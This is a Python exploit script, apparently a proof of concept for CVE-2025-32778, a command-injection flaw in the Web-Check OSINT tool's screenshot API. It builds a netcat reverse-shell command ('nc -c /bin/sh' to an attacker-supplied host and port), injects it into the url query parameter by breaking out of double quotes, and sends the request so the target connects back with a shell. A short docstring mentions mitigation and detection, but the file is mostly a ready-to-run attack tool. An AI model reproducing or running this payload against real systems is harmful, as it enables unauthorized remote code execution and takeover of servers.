import requests as req
import argparse
import urllib.parse


def banner():
    """Print the tool's ASCII-art banner to stdout (no return value)."""
    # Raw string so the backslashes in the art are not treated as escapes.
    art = r"""
  ______     _______     ____   ___ ____  ____       _________ _____ _____ ___  
 / ___\ \   / / ____|   |___ \ / _ \___ \| ___|     |___ /___ \___  |___  ( _ ) 
| |    \ \ / /|  _| _____ __) | | | |__) |___ \ _____ |_ \ __) | / /   / // _ \ 
| |___  \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__) / __/ / /   / /| (_) |
 \____|  \_/  |_____|   |_____|\___/_____|____/     |____/_____/_/   /_/  \___/ 

  ___   ___        ____                 _       
 / _ \ / _ \__  __/ ___|__ _ _ __   ___| | ___  
| | | | | | \ \/ / |   / _` | '_ \ / _ \ |/ _ \ 
| |_| | |_| |>  <| |__| (_| | | | |  __/ | (_) |
 \___/ \___//_/\_\\____\__,_|_| |_|\___|_|\___/ 
    """
    print(art, end="\n")

def url_encode(s: str) -> str:
    """Percent-encode ``s`` for use inside a URL.

    Thin wrapper over ``urllib.parse.quote`` with its default ``safe`` set,
    so ``/`` is left as-is while spaces, quotes and most punctuation are
    encoded.
    """
    encoded = urllib.parse.quote(s)
    return encoded

def revshell(lhost, lport):
    """Return the default reverse-shell command for ``lhost``/``lport``, URL-encoded.

    Both values are interpolated verbatim; nothing here checks that ``lhost``
    is a host name/address or that ``lport`` is numeric (``main`` only
    substitutes a default port, it does not validate either).
    """
    shell = f"nc -c /bin/sh {lhost} {lport}"
    # Encoded because the result is embedded in a query-string parameter by exploit().
    return url_encode(shell)

def exploit(url, shell):
    """Build the request URL that triggers CVE-2025-32778 against ``url``.

    ``url`` is the normalized base (``scheme://host[:port]``) and ``shell`` an
    already percent-encoded command (callers pass it through ``url_encode`` /
    ``revshell``). The ``url`` query parameter of ``/api/screenshot`` carries a
    benign URL followed by a closing double quote, ``;``, the command, and a
    re-opened quote — which only has an effect if the server interpolates the
    parameter into a double-quoted shell command, presumably the root cause of
    the vulnerability (confirm against the advisory). The server-side
    mitigation is to validate the parameter as a URL and never pass it to a
    shell; on the detection side, a screenshot ``url`` parameter containing
    ``"`` or ``;`` is not a legitimate URL and is worth alerting on.
    """
    # NOTE(review): plain string concatenation — no encoding is applied here,
    # so an unencoded ``shell`` would be sent as-is.
    exploit_url = f'{url}/api/screenshot/?url=https://google.com/"; {shell};echo "'
    return exploit_url

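def normalize_url(url: str) -> str:
    """Reduce ``url`` to ``scheme://netloc`` (scheme defaults to ``http``).

    Any path, query or fragment is dropped, so a full endpoint such as
    ``http://host:8000/api/screenshot`` becomes ``http://host:8000``.

    Scheme-less input is accepted as well: ``urllib.parse.urlparse`` puts a
    bare ``host`` into ``.path`` and, on Python 3.9+, parses ``host:8000`` as
    scheme ``host`` with path ``8000`` — which the previous version turned
    into the bogus ``host://8000``. Whenever no netloc is found, the value is
    re-parsed with an explicit ``http://`` prefix so the host (and port)
    land in ``.netloc``.

    Returns the normalized base URL; no exception is raised for empty or
    malformed input (the result is simply unusable).
    """
    parsed = urllib.parse.urlparse(url)
    if not parsed.netloc:
        # No authority component: treat the whole string as host[:port].
        # Inputs starting with "//" already have a netloc and skip this.
        parsed = urllib.parse.urlparse(f"http://{url}")
    scheme = parsed.scheme or "http"
    # rstrip kept for compatibility with the original; it only matters when
    # netloc is empty.
    return f"{scheme}://{parsed.netloc}".rstrip("/")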

def main():
    """
    Argument parser and main program.

    Parses the target URL plus either a custom ``--shell`` command or an
    ``--lhost``/``--lport`` pair, builds the request URL via ``exploit`` and
    issues a single GET to it. Argument errors exit through ``parser.error``.
    Returns ``0`` only on an unexpected (non-requests) exception, ``None``
    otherwise.
    """
    parser = argparse.ArgumentParser(description="Command Injection in Web-Check OSINT Tool developed by Lissy93 ")
    parser.add_argument('-u', '--url', required=True,help='Target Url example (http://vuln.com:8000/api/screenshot)')
    
    # Mutually exclusive args: --shell vs --lhost. --lport is NOT part of the
    # group, so --shell together with --lport is caught by the manual check below.
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('--shell',help='Custom full reverse shell command (RAW, will be URL-encoded by script)')
    group.add_argument('--lhost',help='Local host for the reverse shell')
    
    parser.add_argument('--lport',help='Local port for the reverse shell (requires --lhost, default 4444)')
    args = parser.parse_args()
    
    ###################
    banner()
    ###################
    
    # normalize_url strips any path the user pasted, e.g. "/api/screenshot";
    # exploit() appends the endpoint itself.
    Target_url = normalize_url(args.url)
    lhost = args.lhost
    lport = args.lport
    shell = args.shell
    
    # Validation
    if shell and (lhost or lport):
        parser.error("You cannot use --shell together with --lhost/--lport")
    if lhost and not lport:
        lport = "4444"

    # Payload setup
    if shell:
        print(f"[+] Using custom shell: {shell}")
        print(f"[+] Encoding shell")
        encoded_shell = url_encode(shell)
        final_url = exploit(Target_url, encoded_shell)
    else:
        print(f"[+] Using lhost: {lhost} and lport: {lport}")
        # Decoded only for display; the request uses the encoded form.
        decoded_payload = urllib.parse.unquote(revshell(lhost, lport))
        print(f"[+] Using shell payload: \"{decoded_payload}\"")
        print(f"[+] Encoding payload...")
        final_url = exploit(Target_url, revshell(lhost, lport))
        
    # Send request
    print(f"[+] Connecting to Target...")
    try:
        # NOTE(review): the response is never inspected -- `conn` is unused, so
        # the status code / body give no feedback on whether the request was
        # accepted.
        conn = req.get(final_url,timeout=5)
        print(f"[+] Executing Payload...")
    except req.exceptions.ReadTimeout:
        # A read timeout is deliberately not reported as an error; presumably
        # the server does not answer while the injected command runs -- confirm.
        pass
    except req.exceptions.RequestException as e:
        print(f'[!] HTTP Error: {e}')
    except Exception as e:
        print(f"[!] Error: {e}")
        return 0
    
    # Reached after a timeout or an HTTP-level error as well, so this message
    # does not imply the request succeeded.
    print(f"[+] Exploit sent! Wait for your shell to connect...")

# Script entry point; argparse validation in main() runs before any request is sent.
if __name__ == "__main__":
    main()